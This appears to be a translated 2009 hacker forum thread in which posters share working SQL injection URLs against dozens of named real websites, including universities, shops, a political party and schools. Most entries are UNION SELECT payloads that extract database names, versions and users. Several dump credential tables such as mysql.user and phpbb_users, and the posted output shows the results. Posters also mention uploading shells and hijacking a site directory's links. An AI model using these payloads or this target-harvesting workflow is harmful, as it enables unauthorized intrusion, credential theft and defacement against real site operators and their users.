http://www.smash-uk.com/frf09/news.php?id=-40+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6--
fujirock:5.0.67-userstats-log:fuji06@firestone.dreamhost.com
http://diamondring.gimalai.org/new.php?id=-22+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7--
diamondring:5.0.54-log:diamondring@localhost
http://www.mapawproject.com/news.php?ID=-5+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5,6,7,8--
mapaw:5.0.27:geoffins@72.26.101.80
http://www.crazyhoroscopes.com/display-news.php?id=-5+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4--
arif:5.0.51a-24+lenny1:arif@localhost
http://www.germanfirms.ru/products.php?id=-6+union+select+concat_ws(0x3a,version(),database() ,user())--
4.1.22-standard-log:db156426_4:db156426_4@local2
http://www.naturalaquario.com/products.php?id=-6+union+select+1,concat_ws(0x3a,version(),database (),user())--
5.0.81-community:natuocom_naturalaqua:natuocom_ang@localh ost
http://www.freshmushroomfarm.org/products.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())--
5.0.81-community-log:freshmus_fmf:freshmus_fmfweb@localhost
http://ostrova.onego.ru/hotel.php?id=-4+union+select+concat_ws(0x3a,version(),database() ,user())--
5.0.37:ostrovadb:ostrova_user@home.onego.ru
http://www.kerkira.ru/Hotels/hotel.php?ID=4&i=0&ID_Region=-4+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7--
4.1.22-log:wwwkerkiraru:kerkir01@fe52-1.hc.ru
http://www.sanpancrazioviaggi.it/front/de/hotel.php?id=-999+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8/*
5.0.37-community-nt:sanpancrazio:viaggisan@localhost
http://www.exploringcostarica.com/ing/hotel.php?id=4+union+select+1,concat_ws(0x3a,versi on(),database(),user()),3,4,5,6,7,8,9--
4.1.22-standard-log:explorin_bdexplorin:explorin_usExplo@localhost
http://hi-tekmexico.com/spanish/hotel.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23--
4.1.25-Debian_mt1-log:db9596_secture
http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11--
5.0.67.d7-ourdelta-log:viajando_:viajando_@208.109.181.90
ООО «МАКстрой»
http://www.jbi-cement.ru/?option=news&page=1&id=-5+union+select+1,concat_ws(char(58),TABLE_SCHEMA,T ABLE_NAME,COLUMN_NAME),3+from+INFORMATION_SCHEMA.C OLUMNS+limit+159,1/*
Kiddy child car seats
http://optilab.ru/disable/rus-kiddy/?t=-5+union+select+1,2,concat_ws(char(58),TABLE_SCHEMA ,TABLE_NAME,COLUMN_NAME),4,5,6,7,8+from+INFORMATIO N_SCHEMA.COLUMNS--
mailbrush
17.07.2009, 11:55
http://www.domaine-la-fourmone.com/bouteille2_gb.php?id=-15+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17m y116691@62.193.203.175:my116691:5.0.32-Debian_7etch8-log
http://www2.mtvindia.com/news/news.php?id=-153+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,pass word,user),9+from+mysql.user--
The Indian MTV site :)
http://62.105.76.90:81/benefex/whats_new/market_news/news.php?id=-1+union+select+1,2,group_concat(table_name),4,5,6, 7,8,9,10+from+information_schema.tables--
http://www.fujibikes.com.br/2009/news.php?id=153%20and%20substring(version(),1,1)=5
pr:4
tuc:0
version:5.x.x.x
http://www.meat-trade.com/prg/news.php?id=-1+union+select+1,group_concat(table_name),3,4+from +information_schema.tables--
http://www.fiercekitten.com/blog/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),passw d),6,7+from+neener_members--
http://www.lygus.lt/ITC/news.php?id=-1+union+select+1,group_concat(table_name),3,4,5+fr om+information_schema.tables--
http://qaf.mskiteonline.com/news.php?id=153%20and%20substring(version(),1,1)=4
http://sibselmash.nsk.ru/news.php?id=-1%20union%20select%201,2,3,concat_ws(0x3a,log,psw) ,5,6,7+from+psw--
http://www.wicable.tv/news_and_resources/news.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor mation_schema.tables+limit+30,1--
[PR 6]
http://www.gmm.gu.se/groups/pedersen/popDetail.php?ID=-8+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user()),8,9,10,11,12,13,14--5.0.45:dbldbase:dbl@localhost
http://www.gmm.gu.se/groups/pedersen/popDetail.php?ID=-8+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,pas sword,file_priv),8,9,10,11,12,13,14+from+mysql.use r--===============================
[PR 6]
http://www.coandco.cc/mutat.php?id=9999999999+union+select+1,2,3,4,conca t_ws(0x3a,version(),database(),user()),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,355.0.81:coandco:coandco@loc alhost
===============================
[PR 4]
http://uz.cafspeech.kz/site.php?id=4&lan=english&newsid=-126+union+select+concat_ws(0x3a,version(),database (),user())5.0.41-community-nt:uz_cafspeech:cafspeech@localhost
===============================
[PR 3]
http://www.mgce.uz.ua/post.php?id=-277+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),65.0.45-log:mgce_d2:mgce_d2@192.168.2.2
===============================
[PR 3]
http://www.gslc.cc/displaycms.php?id=-58+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),55.0.67-custom-log:goodshepherdcms:goodshepheradmin@apache2-sith.jubilee.dreamhost.com
===============================
[PR 1]
http://www.nationaltravel.com.py/v1/detalle.del.paquete.php?id=-16+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,105.0.67-community:national_national:national_natio@localho st
http://www.snap.co.uk/shop/nav.php?&dff_catnum=-193+union+select+1,concat_ws(0x3a3a,user(),databas e(),version()),3,4,5+--+
http://www.geekroom.co.uk/ablog/index.php?cat=-1+union+select+1,version()+--+
http://www.revell.ro/store/index.php?action=ViewGroups&grp=-401+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
Database Version: 4.1.22-standard
Database name: revell_store
User name: revell_store@localhost
OS: pc-linux-gnu
http://www.crazyhoroscopes.com/display-news.php?id=-5+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4--
arif:5.0.51a-24+lenny1:arif@localhost
http://alink-design.com/news.php?id=-2+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6--
alinkdesign:5.0.67.d7-ourdelta-log:alinkdesign@72.167.232.143
http://wired.st-and.ac.uk/~wong/agent/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user())--
wong:5.0.32-Debian_7etch10-log:wong@wired.st-and.ac.uk
http://www.myhopeyouth.com/news.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5--
myhope_site:4.1.22-standard:myhope_admin@localhost
http://autosklad35.ru/news/news.php?id=-4+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5--
asklad_sklad:5.0.81-community:asklad_sklad@localhost
http://www.idijabar.or.id/news.php?aksi=detail&id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8--
idijabar_ididb:5.0.67-community:idijabar_aatea@localhost
Calcutta
18.07.2009, 15:04
http://www.verav.ru/common/mpublic.php?num=12311+union+select+1,2,3,4,group_c oncat(0x3a,username,0x3a,admin,0x3a,kwort),6,7,8,9 ,0,1,2,3,4,5,6,7,8,9,0,1+from+user
mr.gr33n
18.07.2009, 22:02
PR3 TIC 30
http://www.vs.com.ua/a-news/news.php?id=-25+union+select+1,2,3,concat(login,0x3a,password), 5,6,7,8,9,0+from+aadm_users--
PR: 3 TIC: 20
http://www.iks.com.ua/rus/aktualno/novyny/news.php?id=-25+union+select+1,2,3,4,concat(username,0x3a,user_ password),6,7,8,9,0,1+from+phpbb_users--
HAXTA4OK
18.07.2009, 23:10
http://dinero.tv/mostrar.nota.php?id=-1+union+select+1,concat_ws(0x3a,database(),user(), version()),3,4,5,6--
http://cmup.fc.up.pt/cmup/v2/view/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,password,nom e),6,7+from+users--
_http://www.tippsupportersclub.com/news.php?id=-1+union+select+1,2,group_concat(column_name),4,5+f rom+information_schema.columns+where+table_name=0x 6a756e696f7273--
mr.gr33n
19.07.2009, 05:06
PR:1 TIC:10
http://www.neolitica.ru/article.php?id=-8+union+select+1,version(),database(),concat(login ,0x3a,pass),5,user(),7,8,9+from+bgblog.user--
mailbrush
19.07.2009, 09:23
http://www.vashiokna.com.ua/calc.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version())/*
u_vashiokna@localhost:vashiokna:4.1.22-log
HAXTA4OK
19.07.2009, 10:30
http://couleurcantal.tv/chaines.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6--&limit=6
root@localhost:fal:5.0.32-Debian_7etch5-log
tables: admin,partenaires,chaines,tags,comment,videos,news letter,pages
login:pass
http://couleurcantal.tv/chaines.php?id=-1+union+select+1,group_concat(concat_Ws(0x3a,login ,pass)),3,4,5,6+from+admin--&limit=6
There is MYSQL.user
http://couleurcantal.tv/chaines.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,user, password,file_priv)),3,4,5,6+from+mysql.user--&limit=6
####################################
http://www.nashe.tv/forum/viewmsg.php?msg_id=-725+union+select+1,2,3,concat_Ws(0x3a,user(),datab ase(),version()),5,6,7,8--
u_nashe@localhost:nashe:4.1.22-log
beerhack
19.07.2009, 12:34
PR 4
http://nemo.mwd.hartford.edu/mwd08/news.php?id=-13+union+select+1,2,version(),4--
Database Version: 5.0.45-log
Database name: websitedata
User name: iitsite@localhost
PR 4
http://cityculture.org/city.php?id=-3063+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,d atabase(),version(),user()),10,11,12,13,14,15,16,1 7,18,19,20--
PR 4
http://www.vector-images.com.ua/vector.php?vect_id=-8+union+select+concat_ws(0x3a,database(),version() ,user())--
PR 3, TIC 30
http://www.blacktyres.ru/pages/disks/vendor.php?id=-42+union+select+concat_ws(0x3a,database(),version( ),user())--
PR 2
http://www.modsearch.com/reviews/vendor.php?id=-148+union+select+1,2,3,4,5,concat_ws(0x3a,database (),version(),user()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26--
PR 2
http://www.bringitontours.com/package/index.php?destination_id=-1+union+select+1,2,concat_ws(0x3a,database(),versi on(),user())--
WAPLOG.EU/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+30,1--
etc.
P.S. You can replace any site's link with your own
You can find it out like this
WAPLOG.EU/outtop.php?uid=-238+union+select+concat_ws(0x3a,site_name,link,pas s,email)+from+users+where+uid=254--
Where UID is the number of the registered site
http://www.factway.net/en/news.php?id=-9+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8,9--
factway_factway:5.0.81-community:factway_factway@localhost
http://www.oekoeffizienz.at/news.php?id=-9+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,data base(),version(),user()),10,11,12--
oekoeffizienz:5.0.32-Debian_7etch10-log:oeko@localhost
http://www.spcf.edu.ph/nextpage/news.php?t=1&id=-38+union+select+1,2,3,4,5,6,concat_ws(0x3a,databas e(),version(),user()),8,9,10--
spcfedup_spcfdbf:5.0.81-community:spcfedup@localhost
beerhack
20.07.2009, 05:41
http://www.hendersonpartnersllp.ca/bios.php?id=-41+union+select+1,version(),3,4,5,6/*
Database Version: 5.0.45
Database name: royliu
User name: royliu@76.12.13.92
had nothing better to do:
http://strelok-ohotnik.com.ua/news.php?action=one&id=13+union+select+1,2,concat_ws(0x3a,username,use r_password),4,5,6,7,8,9,10+from+phpbb_users+where+ user_id=56--
http://www.kraina-z.com.ua/ua/news.php?id=22'+union+select+1,table_name,3,4,5+fr om+information_schema.tables+limit+100--%201
mailbrush
20.07.2009, 12:34
http://www.facody.com/sat.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7/*facodycom@212.81.143.131:facodycom:5.0.27
HAXTA4OK
20.07.2009, 21:17
PR: 7
http://tv.jlu.edu.cn/v2/index.php?o=showc;id=-1+union+select+1,concat_Ws(0x3a,user(),database(), version()),3,4,5--
tvwing@localhost:tv:4.0.22-standard
FC milan :D
http://www.clubmilan.net/news.php?id=-484+union+select+1,concat_ws(0x3a,database(),versi on(),user()),3,4,5,6,7--
CBMILAN_DB:5.0.81-COMMUNITY-LOG:CBMILAN_US@LOCALHOST
Matrix, damn it :p
http://www.mxo.it/news.php?id=-60+union+select+concat_ws(0x3a,database(),version( ),user())--
Sql12117_5:4.0.30-standard-log:Sql12117@62.149.141.22
[PR 6]
http://www.hellotourist.net/sajatlap.php?ID=-14227+union+select+1,2,3,4,5,6,7,8,version(),10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 ,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76_+CA+ LA+SOMARA+Arzachena+Hotel5.0.45-Debian_1ubuntu3.4-log:janositibor:janositibor@localhost
===================================
[PR 6]
http://www.jugglingdb.com/events/index.php?id=-7511+union+select+1,2,3,concat_ws(0x3a,version(),d atabase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18&lang=ca5.0.27:ijdb:colin@localhost
===================================
[PR 4]
http://dev.4spe.org/cc/detail.php?id=-294+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,305.0.51a-3ubuntu5.1-log:spe:speweb@localhost
===================================
[PR 4]
http://www.cc-vw.org/index.php?id=974&level=-7+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6--5.0.45-log:sr0781254:sr0781254@81.31.99.12
===================================
[PR 3]
http://cc.cc.moose.cc/maps/results.php?id=-13+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,245.0.77-community:cc_blog:cc_php@localhost
http://cc.cc.moose.cc/maps/results.php?id=-13+union+select+1,concat_ws(0x3a,user_login,user_p ass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24+from+cc_blog.wp_users=============== ====================
[PR 0]
http://www.badlaav.co.cc/page.php?id=-19+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user())5.0.81-community:mechier_badlaav:mechier_dbuser@localhost
beerhack
21.07.2009, 03:12
PR 6
http://www.rha.msu.edu/news.php?id=13+union+select+1,2,3,4,5,6,7,8,versio n(),0/*
Database Version: 5.0.44-log
Database name: rha
User name: rha@localhost
HAXTA4OK
21.07.2009, 09:19
http://www.hey-u.tv/detail/detail.php?nr=26&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47--
x000102w@localhost:x000102w:5.0.51a-Max
###################################
PR=5
tell me, what's the trick... do I need +and+1=0 for it to give me a result?? :) first time I've substituted it this way
http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,concat_WS(0x 3a,user(),database(),version()),3,4,5,6,7,8,9--
root@210.22.13.89:ipanel:5.0.26-standard-log
mysql.user is present
http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,'p',3,4,5,6, 7,8,9+from+mysql.user--
result: p , MQ= off
tables: (some are repeated)
####################################
PR=4
http://chamjb.eduhope.net/bbs/comment_write.php?board=chamjic-2&id=303&mode=modify&no=281+and+substring(version(),1,1)=4--
петрович
21.07.2009, 11:53
http://www.vizginta.lt/index.php?ka_rodyti=problemos&pr_nr=1'+UNION+SELECT+1,2,3/*
HAXTA4OK
21.07.2009, 12:49
http://www.ribera.tv/videos.php?id=1+union+select+1,concat_ws(0x3a,user (),database(),version()),3,4,5,6,7,8,9,10,11,12,13 ,14,15--
ribera00_video@localhost:ribera00_video:4.1.22-standard
####################################
http://yt-export.com/details.php?kind=07&kinds=07a23&id=-1'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11,12%23
ytexportcom@218.5.74.137:ytexportcom:5.0.41-log
####################################
PR: 5
http://www.ee.ndhu.edu.tw/main.php?main=dept_course_detail&id=1&idc=134'+and+substring(version(),1,1)=5%23
####################################
Pashkela, one for you again =) again I couldn't upload a shell ((( (if you upload one, send me a PM )))))
PR: 4
http://www.catolica.edu.sv/inicio.php?name=Decanato&id=-1'+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13+from+mysql.u ser+--+
5.0.26-Max:root@localhost:ppal
http://www.snis.ch/conference.php?ID=-13+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12,13--
PR 0
Version - 5.0.67-log
database - swissinternationalstudiesch
user -wsnis@imu143.infomaniak.ch
http://www.forumgallery.com/current_on1.php?id=222+union+select+1,2,3,4,5,6,7, 8,9,concat_ws(0x3a,database(),version(),user()),11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 ,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,7 8,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94, 95,96,97,98,99,100,101,102,103,104,105,106,107,108 ,109,110,111,112,113,114,115,116,117,118,119,120,1 21,122,123,124,125,126,127,128,129,130,131,132,133 ,134,135,136,137,138,139,140,141,142,143,144,145,1 46,147,148,149,150,151,152,153,154,155,156,157,158 ,159,160,161,162--
:eek:
forumgallery:4.1.22:forumg63@localhost
http://www.metallicafan.de/news.php?id=-188+union+select+1,2,3,4,5,6,concat_ws(0x3a,databa se(),version(),user()),8,9--
DB40286:4.0.27-log:www.metallicafan.de@jenkins.stor
http://europeanspeedclub.com/news.php?id=-930+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,data base(),version(),user()),9,10,11,12--
ideallinie:5.0.32-Debian_7etch6-log:ideallinie@localhost
http://www.jestemdobry.pl/news.php?ID=-9+union+select+1,concat_ws(0x3a,database(),version (),user()),3--
jestemdobry:5.0.45:jestemdobry_db@localhost
PR 5, TIC 450
http://www.russkie.org/place.php?module=strana&id=-12+union+select+1,concat_ws(0x3a,database(),versio n(),user())--
PR 5
http://www.peter-pearson.com/fireupflash/project.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,email,user name,thepass),7,8,9,10,11,12,13,14,15,16,17,18+fro m+users--
PR 3, TIC 20
http://www.devision.com.ua/project.php?cat=1&sid=2&id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion(),user()),6,7,8,9,10,11,12,13,14--
PR 3
http://www.sammakorn.co.th/project.php?ID=-1+union+select+1,2,3,4,5,concat_ws(0x3a,database() ,version(),user()),7--
PR 3
http://www.chastainconstruction.com/project.php?ID=1+union+select+concat_ws(0x3a,datab ase(),version(),user()),2,3,4,5--
output in the page source: projimg_chastain:4.1.20:wsdr@localhost
PR 3
http://www.unbound-media.com/project.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,databa se(),version(),user()),9,10--
Skofield
22.07.2009, 01:10
PR 4
http://www.bishopdwenger.com/content.php?id=-64+union+select+group_concat(username,0x3a,passwor d),2+from+admin/*
Database Version: 5.0.45-log
Database name: bishop_dwenger
User name: bd_dbsiteuser@localhost
beerhack
22.07.2009, 01:26
http://www.paceeducation.ca/course.php?id=-41+union+select+version(),2--
Database Version: 5.0.51a
Database name: pace
User name: pace@localhost
--------------------------------------------------------------------
http://www.initiativa.ru/index.php?id=39+union+select+1,2,unhex(hex(version ())),4/*
Database Version: 4.1.16-log
Database name: init
User name: init@localhost
--------------------------------------------------------------------
http://artelf.ru/items.php?id=-39+union+select+1,unhex(hex(version())),3,4,5,6,7, 8,9,0/*
Database Version: 4.1.18
Database name: artelf
User name: artelf@localhost
http://www.slavsandtatars.com/about.php?id=-1+union+select+unhex(hex(concat_ws(0x3a,username,p asswd))),2,3+from+admin--
HAXTA4OK
22.07.2009, 09:42
http://www.liceocastilla.edu.sv/vista_galeria.php?id=1'+union+select+1,2,3,concat_ Ws(0x3a,user(),database(),version()),5,6/*
liceocas@host20.digitalvalley.com:liceocastilla_ed u_sv_colegio:5.0.45
lunch break..
http://athletics.carrollu.edu/news_detail.asp?newsid=-2582+union+select+1,2,3,username,password,6,7,8+fr om+cms.cmsuser/*
Version: 5.0.22-community-nt
User: web@localhost
Dbname: athletics
file_priv=Y
=)
ell.kz/index.php?id=2&target=163 and ascii(substring(user(),4,1))<95
Here's what I've gathered so far : DHT
http://sotovikcity.ru/phone.php?ID=-1+union+select+1,concat_WS(0x3a,name,password),3+f rom+auth--
http://cifravoz.ru/views3.php?id=-173+union+select+1,group_concat(table_name),3,4,5, 6,7+from+information_schema.tables--
http://msmobiles.com/mobile/news.php?id=-1+union+select+1,2,unhex(hex(group_concat(concat_W S(0x3a,rus_login,rus_password)))),4,5,6,7,8,9,10,1 1,12,13,14,15+from+msmo_registered_users--
http://classifieds.bechna.com/view_sale_details.php?id=-1+union+select+pass,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15+from+admin--&city=Delhi
http://www.chat.hcgomel.com/news.php?ID=-311+union+select+1,2,3,unhex(hex(concat_ws(0x3a,us ername,user_password,user_icq))),5,6,7,8+from+phpb b_users+limit+0,1--
http://www.pioner.su/news.php?id=-30+union+select+1,concat_ws(0x3a,version(),user(), database(),@@version_compile_os),3--
4.1.22-log:allianc0_@localhost:allianc0_:portbld-freebsd6.1
http://www.rstd.ru/news.php?id=-30+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6--
5.0.67-log:u145464_2:u145464@10.10.153.183
http://www.tviphilippines.com/article.php?id=-21+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9,10,11,12,13,14--
5.0.81-community-log:tviphili_tviphil@localhost:tviphili_tviphils
http://www.kotogoto.com/article.php?id=21+union+select+1,2,3,concat_ws(0x3 a,version(),database(),user()),5,6--
5.0.24a-Debian_2.dotdeb.0-log:db25283:db25283@localhost
http://www.grp-s.ru/article.php?id=-21+union+select+concat_ws(0x3a,version(),user(),ve rsion(),database()),2,3,4--
5.0.67-log:grpsgrp_grps@localhost:5.0.67-log:grpsgrp_grps
http://dev.onlinedrummer.com/article.php?id=-21+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11,12,13,14--
5.0.45-community:oldpublic@localhost:SiteFeatures
http://developpement-durable.ujjef.com/point.php?id=4+union+select+1,2,3,group_concat(tab le_name),5,6,7,8,9,10,11,12,13,14,15+from+informat ion_schema.tables--
http://www.golfdirect.co.za/golf.php?id=-4+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9--
5.0.81-community:wwwgolf_golfdirect:wwwgolf_golfd@localho st
HAXTA4OK
22.07.2009, 23:36
http://www.ort.be/ortsite/index.php?nid=-134+union+select+1,concat_ws(0x3a,database(),user( ),version()),3,4,5,6,7,8,9,10--
ORTWEBSITE:HY_ORTWEBSITE@LOCALHOST:4.1.22-COMMUNITY-NT
####################################
Kharkiv National University of Radio Electronics, Department of Fundamentals of Radio Engineering
http://ort.kture.kharkov.ua/prepod.php?type=view&id=-1'+union+select+1,concat_Ws(0x3a,database(),user() ,version()),3,4,5,6,7,8,9/*
siteprom_ort:siteprom_ort@ws10.kture.itl.net.ua:4. 1.22-standard-log
####################################
http://www.pnp.de/nachrichten/kommunalwahl08/ort.php?id=-1+union+select+1,concat_Ws(0x3a,user(),database(), version()),3,4,5,6,7--
PNP@HTTP.VGP.DE:KOMMUNALWAHL_2008:5.1.34-LOG
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
http://www.chorverband-ekhn.de/fcnd/showobject.php?art=ort&id=-1+union+select+concat_Ws(0x3a,database(),user(),ve rsion())--
Ort: db230516389:dbo230516389@212.227.29.9:4.0.27-max-log
http://www.thewest.cz/portal/clanek_cely.php?id=-12+union+select+1,2,3,4,5,concat_ws(0x3a,user()),7 ,8,9,10,11,12,13+from+users--
http://billiard4u.ru/faq/faq.php?id=-1+union+select+1,2,concat_WS(0x3a,password,login), 4,5,6+from+user--
http://www.cartell.ru/faq.php?id=-13+union+select+1,2,group_concat(table_name),4+fro m+information_schema.tables--
http://www.sky-radio.fm/sreda/print.php?sid=-1+union+select+1,2,concat_ws(0x3a,user_name,user_p assword),4,5,6+from+fphotos_users+limit+0,1--
molotovkeyt
23.07.2009, 06:57
The mega design shop "Pimentos" with its hole-ridden site.
http://pimentos.com.ua/?mid=15&action=news_detail&new_id=-74+union+select+1,2,version%28%29,4,5,6,7,8,9,0,1, 2,3,14--
In the "Our Works" section, roughly 90% of the almost 60 sites have sql inj.
All of them have databases from the 5.x branch.
The most interesting of them:
Official site of the Ukrainian party "Reforms and Order"
http://www.prp.org.ua/index.php?mid=15&action=posit_full&id=-56+union+select+1,version%28%29,3,4,5,6,7,8,9,0,1--
Site of the all-Ukrainian magazine "Stroysya!"
http://www.strojsya.kiev.ua/?mid=4&action=price_list&rubric_id=-3521+union+select+1,2,3,version%28%29,5,6--
HAXTA4OK
23.07.2009, 12:48
http://pfarre.deutschwagram.com/Ort.php?ID=1+union+select+1,concat_ws(0x3a,user(), database(),version()),3,4,5--
pfarre@localhost:pfarre:5.0.22-Debian_0ubuntu6.06.10-log
Staratel
23.07.2009, 15:19
http://www.air-bed.ru/cover.php?name=compare&id_groups=1'+union+select+unhex(hex(version()))/*
http://www.air-bed.ru/cover.php?name=compare&id_groups=1'+union+select+password+from+users/*
http://www.brettex.com.ua/index.php?dir=oblad&page=oblad&dev=35'+union+select+1,concat_ws(0x3a,user(),versi on(),database()),3,4,5,6,7,8--+
User: u_brettex@localhost
Version: 4.1.22-log
DB: brettex
beerhack
23.07.2009, 18:55
http://rapl.ru/article.php?id=-39'+union+select+1,version(),3,4,5,6,7,8,9/*
Database Version: 5.0.45-community-nt-log
Database name: 1gb_x_rplf
User name: 1gb_x_rplf@127.0.0.1
-------------------------------------------------------------------
http://cbskiev.library.ru/system/smi/article.php?id=39+union+select+1,version(),3,4,5,6 ,7,8,9,0/*
Database Version: 4.1.20
Database name: cbskiev_db01
User name: libsites@localhost
ph1l1ster
23.07.2009, 21:13
A portion of sweets ;)
wallace.edu
PR 6
5.0.45-community-nt-log:web_mysql@localhost
http://www.wallace.edu/student_resources/pathways/news_full_article.htm?id=-14+union+select+1,concat(version(),0x3a,user()),3, 4,5,6--
MySql:
http://www.wallace.edu/student_resources/pathways/news_full_article.htm?id=-14+union+select+1,concat(user,0x3a,password),3,4,5 ,6+from+mysql.user--
fasn.rutgers.edu
PR 6
root@ru-6j16advh2j9z:5.0.45-community-nt
http://fasn.rutgers.edu/announcements.php?id=-14+union+Select+1,2,concat(user(),0x3a,version()), 4,5--
File_priv = Y
MySql:
http://fasn.rutgers.edu/announcements.php?id=-14+union+Select+1,2,concat(user,0x3a,password),4,5 +from+mysql.user--
hedgecock.bio.jhu.edu
PR 5
4.0.15-standard:webserver@localhost
http://hedgecock.bio.jhu.edu/information/article.php?id=-14+union+select+1,2,concat(version(),0x3a,user()), 4,5,6--
http://hedgecock.bio.jhu.edu/information/article.php?id=-14+union+select+1,2,concat(name,0x3a,pass),4,5,6+f rom+users--
library.ccuniversity.edu
PR 5
5.0.37-community-nt:root@localhost
http://library.ccuniversity.edu/index.php?ID=14+and+1=0+Union+Select+1,concat(vers ion(),0x3a,user()),3--
File_priv = Y
[PR 3]
http://www.dreambike.biz/pregled.php?id=-832+union+select+concat_ws(0x3a,version(),database (),user())
4.1.20:dreambike:dreambike0@localhost
table 'admin' Found
====================================
[PR 2]
http://www.giacint.biz/sobitiya_txt.php?id=-13+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6
5.0.81-community:favorite_giacint:favorite_favorit@localh ost
====================================
[PR 2]
http://www.traxon.be/bandpress/product.php?id=9999999999+union+select+1,2,3,4,5,6 ,7,8,9,concat_ws(0x3a,version(),database(),user()) ,11,12,13,14,15,16--&type=sh
5.0.45-Dotdeb_0.dotdeb.1.1.CGA.1:traxon:admin@hostingst50 9.isp.belgacom.be
====================================
[PR 2]
http://neftekamsk.biz/section.php?id=-10011+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(),user()),7
4.1.22-log:wwwurengoyinforu_neftekamsk:neftekam_nefteka@f e51.hc.ru
====================================
[PR 0]
http://blogpost.photowork.biz/item.php?id=-250272+union+select+concat_ws(0x3a,version(),datab ase(),user())
4.1.22-standard-log:photowor_ecost:photowor_testig@localhost
====================================
[PR 0]
http://www.at-rent.be/product.php?id=-50+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user())--
5.0.32-Debian_7etch3-log:atrent:atrent@localhost
http://www.at-rent.be/product.php?id=-50+union+select+1,2,3,concat_ws(0x3a,username,user _password)+from+phpbb_users--
====================================
[PR 0]
